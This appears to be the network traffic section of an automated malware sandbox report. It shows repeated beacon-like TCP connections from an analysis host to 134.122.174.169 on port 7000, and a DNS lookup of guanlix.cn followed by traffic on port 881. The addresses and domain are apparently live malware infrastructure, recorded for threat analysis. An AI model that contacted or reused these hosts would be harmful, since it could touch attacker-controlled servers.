Jul 2, 2024 19:30:03.564750910 CEST	7000	49735	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:04.856256008 CEST	49735	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:04.861502886 CEST	7000	49735	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:05.441559076 CEST	7000	49735	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:05.443377972 CEST	49735	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:08.684088945 CEST	49735	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:08.686400890 CEST	49736	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:08.688942909 CEST	7000	49735	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:08.691242933 CEST	7000	49736	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:08.691344976 CEST	49736	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:08.735296011 CEST	49736	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:08.740626097 CEST	7000	49736	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:08.746973038 CEST	49736	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:08.751822948 CEST	7000	49736	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:08.825150013 CEST	49736	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:08.829946995 CEST	7000	49736	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:10.775772095 CEST	7000	49736	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:10.775923967 CEST	49736	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:13.842221975 CEST	49736	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:13.846715927 CEST	49737	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:14.152818918 CEST	49736	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:14.753212929 CEST	7000	49736	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:14.753238916 CEST	7000	49737	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:14.753249884 CEST	7000	49736	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:14.753390074 CEST	49737	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:14.753392935 CEST	49736	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:14.849688053 CEST	49737	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:14.854556084 CEST	7000	49737	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:16.810149908 CEST	7000	49737	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:16.810292959 CEST	49737	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:18.434859037 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:30:18.450139999 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:30:20.092571020 CEST	49737	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:20.096887112 CEST	49738	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:20.098187923 CEST	7000	49737	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:20.101769924 CEST	7000	49738	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:20.101874113 CEST	49738	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:20.147847891 CEST	49738	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:20.152904034 CEST	7000	49738	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:22.155810118 CEST	7000	49738	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:22.155894041 CEST	49738	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:25.169611931 CEST	49739	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:25.169620037 CEST	49738	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:25.174468994 CEST	7000	49738	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:25.174493074 CEST	7000	49739	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:25.174602032 CEST	49739	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:25.309382915 CEST	49739	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:25.318136930 CEST	7000	49739	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:25.481513023 CEST	49739	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:25.486725092 CEST	7000	49739	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:25.496853113 CEST	49739	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:25.502176046 CEST	7000	49739	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:25.528167963 CEST	49739	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:25.533020020 CEST	7000	49739	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:25.717011929 CEST	49739	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:25.723362923 CEST	7000	49739	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:27.197320938 CEST	7000	49739	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:27.197410107 CEST	49739	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:30.715362072 CEST	49739	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:30.719428062 CEST	49740	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:30.720454931 CEST	7000	49739	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:30.724442959 CEST	7000	49740	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:30.724566936 CEST	49740	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:30.792212009 CEST	49740	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:30.797368050 CEST	7000	49740	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:32.841278076 CEST	7000	49740	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:32.841388941 CEST	49740	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:36.793535948 CEST	49740	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:36.796175003 CEST	49741	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:36.799988985 CEST	7000	49740	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:36.802227974 CEST	7000	49741	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:36.802330017 CEST	49741	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:36.897264004 CEST	49741	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:36.902235031 CEST	7000	49741	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:38.873677969 CEST	7000	49741	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:38.873779058 CEST	49741	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:41.920496941 CEST	49741	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:41.923003912 CEST	49742	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:41.927505016 CEST	7000	49741	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:41.928380966 CEST	7000	49742	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:41.928509951 CEST	49742	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:41.974278927 CEST	49742	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:41.979114056 CEST	7000	49742	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:42.278321028 CEST	49742	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:42.285047054 CEST	7000	49742	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:43.295420885 CEST	49742	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:43.300215960 CEST	7000	49742	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:43.962316990 CEST	7000	49742	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:43.962382078 CEST	49742	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:47.231038094 CEST	49742	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:47.233432055 CEST	49743	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:47.235815048 CEST	7000	49742	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:47.238224030 CEST	7000	49743	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:47.238507032 CEST	49743	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:47.322927952 CEST	49743	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:47.327991009 CEST	7000	49743	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:49.297533035 CEST	7000	49743	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:49.297652006 CEST	49743	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:52.324985027 CEST	49743	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:52.326944113 CEST	49744	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:52.335215092 CEST	7000	49743	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:52.335875034 CEST	7000	49744	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:52.335953951 CEST	49744	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:52.363049984 CEST	49744	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:52.368151903 CEST	7000	49744	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:54.432667971 CEST	7000	49744	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:54.432956934 CEST	49744	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:57.372081041 CEST	49744	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:57.375379086 CEST	49745	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:57.377944946 CEST	7000	49744	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:57.380502939 CEST	7000	49745	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:57.380614996 CEST	49745	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:57.449955940 CEST	49745	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:57.458451033 CEST	7000	49745	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:57.544472933 CEST	49745	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:57.549258947 CEST	7000	49745	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:57.606540918 CEST	49745	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:57.611429930 CEST	7000	49745	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:59.436841011 CEST	7000	49745	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:59.436904907 CEST	49745	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:02.762373924 CEST	49745	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:02.764079094 CEST	49746	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:02.767191887 CEST	7000	49745	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:02.768848896 CEST	7000	49746	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:02.768924952 CEST	49746	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:02.802392960 CEST	49746	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:03.000890970 CEST	7000	49746	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:03.000953913 CEST	49746	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:03.007466078 CEST	7000	49746	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:04.823136091 CEST	7000	49746	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:04.823209047 CEST	49746	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:07.951663017 CEST	49746	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:07.951776981 CEST	49747	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:07.957549095 CEST	7000	49746	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:07.957775116 CEST	7000	49747	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:07.958101034 CEST	49747	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:08.063879967 CEST	49747	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:08.068898916 CEST	7000	49747	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:10.011204004 CEST	7000	49747	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:10.011396885 CEST	49747	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:13.199958086 CEST	49747	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:13.202524900 CEST	49748	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:13.204940081 CEST	7000	49747	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:13.207576036 CEST	7000	49748	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:13.207731009 CEST	49748	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:13.237282038 CEST	49748	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:13.242218018 CEST	7000	49748	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:15.429614067 CEST	7000	49748	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:15.429680109 CEST	49748	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:18.299367905 CEST	49748	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:18.301054955 CEST	49749	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:18.306204081 CEST	7000	49748	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:18.307039976 CEST	7000	49749	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:18.307147026 CEST	49749	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:18.415491104 CEST	49749	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:18.568823099 CEST	7000	49749	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:18.778371096 CEST	49749	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:18.783483982 CEST	7000	49749	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:20.354331017 CEST	7000	49749	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:20.354454994 CEST	49749	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:24.169086933 CEST	49749	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:24.173999071 CEST	7000	49749	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:24.177870035 CEST	49750	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:24.182815075 CEST	7000	49750	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:24.182986021 CEST	49750	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:24.291310072 CEST	49750	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:24.296179056 CEST	7000	49750	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:26.248647928 CEST	7000	49750	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:26.248788118 CEST	49750	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:29.356277943 CEST	49750	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:29.358205080 CEST	49751	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:29.362138987 CEST	7000	49750	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:29.363795996 CEST	7000	49751	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:29.363874912 CEST	49751	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:29.391676903 CEST	49751	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:29.396912098 CEST	7000	49751	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:31.416445971 CEST	7000	49751	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:31.416575909 CEST	49751	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:34.421046019 CEST	49752	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:34.421046972 CEST	49751	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:34.426074028 CEST	7000	49752	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:34.426194906 CEST	7000	49751	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:34.426250935 CEST	49752	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:34.516607046 CEST	49752	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:34.521615028 CEST	7000	49752	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:34.559439898 CEST	49752	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:34.566580057 CEST	7000	49752	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:34.653336048 CEST	49752	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:34.659912109 CEST	7000	49752	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:36.464318991 CEST	7000	49752	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:36.464508057 CEST	49752	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:39.717206955 CEST	49752	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:39.717344046 CEST	49753	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:39.722126007 CEST	7000	49752	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:39.722143888 CEST	7000	49753	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:39.722512007 CEST	49753	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:39.783711910 CEST	49753	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:39.789237976 CEST	7000	49753	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:41.805804014 CEST	7000	49753	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:41.805944920 CEST	49753	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:45.074840069 CEST	49753	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:45.077677965 CEST	49754	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:45.083702087 CEST	7000	49753	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:45.086682081 CEST	7000	49754	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:45.086767912 CEST	49754	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:45.115073919 CEST	49754	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:45.418534040 CEST	49754	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:46.029532909 CEST	49754	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:46.160366058 CEST	7000	49754	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:46.160378933 CEST	7000	49754	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:46.160598993 CEST	7000	49754	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:47.157784939 CEST	7000	49754	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:47.159552097 CEST	49754	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:50.636271000 CEST	49754	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:50.638814926 CEST	49755	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:50.641449928 CEST	7000	49754	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:50.645524025 CEST	7000	49755	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:50.645625114 CEST	49755	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:50.735129118 CEST	49755	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:50.739895105 CEST	7000	49755	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:52.699563980 CEST	7000	49755	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:52.699651003 CEST	49755	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:55.887594938 CEST	49755	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:55.889283895 CEST	49756	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:55.894865036 CEST	7000	49755	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:55.897037029 CEST	7000	49756	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:55.897145987 CEST	49756	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:55.934952021 CEST	49756	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:55.939755917 CEST	7000	49756	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:56.106848001 CEST	49756	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:56.112548113 CEST	7000	49756	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:56.215698957 CEST	49756	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:56.225126028 CEST	7000	49756	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:56.278193951 CEST	49756	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:56.285275936 CEST	7000	49756	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:56.293874979 CEST	49756	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:31:56.300966978 CEST	7000	49756	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:57.950386047 CEST	7000	49756	134.122.174.169	192.168.2.8
Jul 2, 2024 19:31:57.950444937 CEST	49756	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:01.372077942 CEST	49756	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:01.376926899 CEST	7000	49756	134.122.174.169	192.168.2.8
Jul 2, 2024 19:32:01.398260117 CEST	49757	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:01.405540943 CEST	7000	49757	134.122.174.169	192.168.2.8
Jul 2, 2024 19:32:01.407675982 CEST	49757	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:01.590965033 CEST	49757	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:01.596873045 CEST	7000	49757	134.122.174.169	192.168.2.8
Jul 2, 2024 19:32:01.606439114 CEST	49757	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:01.611619949 CEST	7000	49757	134.122.174.169	192.168.2.8
Jul 2, 2024 19:32:01.747338057 CEST	49757	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:01.752254009 CEST	7000	49757	134.122.174.169	192.168.2.8
Jul 2, 2024 19:32:03.475419998 CEST	7000	49757	134.122.174.169	192.168.2.8
Jul 2, 2024 19:32:03.475570917 CEST	49757	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:06.840646982 CEST	49757	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:06.842832088 CEST	49758	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:06.845565081 CEST	7000	49757	134.122.174.169	192.168.2.8
Jul 2, 2024 19:32:06.847601891 CEST	7000	49758	134.122.174.169	192.168.2.8
Jul 2, 2024 19:32:06.847763062 CEST	49758	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:06.903548002 CEST	49758	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:06.908401012 CEST	7000	49758	134.122.174.169	192.168.2.8
Jul 2, 2024 19:32:08.905579090 CEST	7000	49758	134.122.174.169	192.168.2.8
Jul 2, 2024 19:32:08.905706882 CEST	49758	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:11.918708086 CEST	49758	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:11.920579910 CEST	49759	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:11.923651934 CEST	7000	49758	134.122.174.169	192.168.2.8
Jul 2, 2024 19:32:11.925474882 CEST	7000	49759	134.122.174.169	192.168.2.8
Jul 2, 2024 19:32:11.925570011 CEST	49759	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:11.954216957 CEST	49759	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:11.959784985 CEST	7000	49759	134.122.174.169	192.168.2.8
Jul 2, 2024 19:32:13.983453989 CEST	7000	49759	134.122.174.169	192.168.2.8
Jul 2, 2024 19:32:13.983519077 CEST	49759	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:17.496843100 CEST	49759	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:17.500328064 CEST	49760	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:17.502249002 CEST	7000	49759	134.122.174.169	192.168.2.8
Jul 2, 2024 19:32:17.510435104 CEST	7000	49760	134.122.174.169	192.168.2.8
Jul 2, 2024 19:32:17.510668993 CEST	49760	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:17.584835052 CEST	49760	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:17.589854956 CEST	7000	49760	134.122.174.169	192.168.2.8
Jul 2, 2024 19:32:17.606523991 CEST	49760	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:17.614480972 CEST	7000	49760	134.122.174.169	192.168.2.8
Jul 2, 2024 19:32:17.653307915 CEST	49760	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:17.661465883 CEST	7000	49760	134.122.174.169	192.168.2.8
Jul 2, 2024 19:32:19.577548981 CEST	7000	49760	134.122.174.169	192.168.2.8
Jul 2, 2024 19:32:19.577711105 CEST	49760	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:22.763567924 CEST	49760	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:22.764404058 CEST	49761	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:22.768897057 CEST	7000	49760	134.122.174.169	192.168.2.8
Jul 2, 2024 19:32:22.769207954 CEST	7000	49761	134.122.174.169	192.168.2.8
Jul 2, 2024 19:32:22.769339085 CEST	49761	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:22.875261068 CEST	49761	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:22.880747080 CEST	7000	49761	134.122.174.169	192.168.2.8
Jul 2, 2024 19:32:24.309571981 CEST	49761	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:24.314403057 CEST	7000	49761	134.122.174.169	192.168.2.8
Jul 2, 2024 19:32:24.831147909 CEST	7000	49761	134.122.174.169	192.168.2.8
Jul 2, 2024 19:32:24.831609964 CEST	49761	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:28.247117996 CEST	49761	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:28.250333071 CEST	49762	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:28.252075911 CEST	7000	49761	134.122.174.169	192.168.2.8
Jul 2, 2024 19:32:28.255599022 CEST	7000	49762	134.122.174.169	192.168.2.8
Jul 2, 2024 19:32:28.255682945 CEST	49762	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:28.284893036 CEST	49762	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:28.289771080 CEST	7000	49762	134.122.174.169	192.168.2.8
Jul 2, 2024 19:32:30.309493065 CEST	7000	49762	134.122.174.169	192.168.2.8
Jul 2, 2024 19:32:30.309556961 CEST	49762	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:33.794002056 CEST	49762	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:33.795913935 CEST	49763	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:33.802814960 CEST	7000	49762	134.122.174.169	192.168.2.8
Jul 2, 2024 19:32:33.804368019 CEST	7000	49763	134.122.174.169	192.168.2.8
Jul 2, 2024 19:32:33.804440022 CEST	49763	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:33.845343113 CEST	49763	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:33.853243113 CEST	7000	49763	134.122.174.169	192.168.2.8
Jul 2, 2024 19:32:33.903445005 CEST	49763	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:33.911473036 CEST	7000	49763	134.122.174.169	192.168.2.8
Jul 2, 2024 19:32:34.512639999 CEST	49763	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:32:34.517575026 CEST	7000	49763	134.122.174.169	192.168.2.8
Jul 2, 2024 19:32:35.839896917 CEST	7000	49763	134.122.174.169	192.168.2.8
Jul 2, 2024 19:32:35.839998007 CEST	49763	7000	192.168.2.8	134.122.174.169

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 2, 2024 19:28:28.492990017 CEST	59081	53	192.168.2.8	1.1.1.1
Jul 2, 2024 19:28:28.892086983 CEST	53	59081	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 2, 2024 19:28:28.492990017 CEST	192.168.2.8	1.1.1.1	0xe0	Standard query (0)	guanlix.cn	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 2, 2024 19:28:28.892086983 CEST	1.1.1.1	192.168.2.8	0xe0	No error (0)	guanlix.cn		91.208.240.157	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

guanlix.cn:881

HTTP Packets

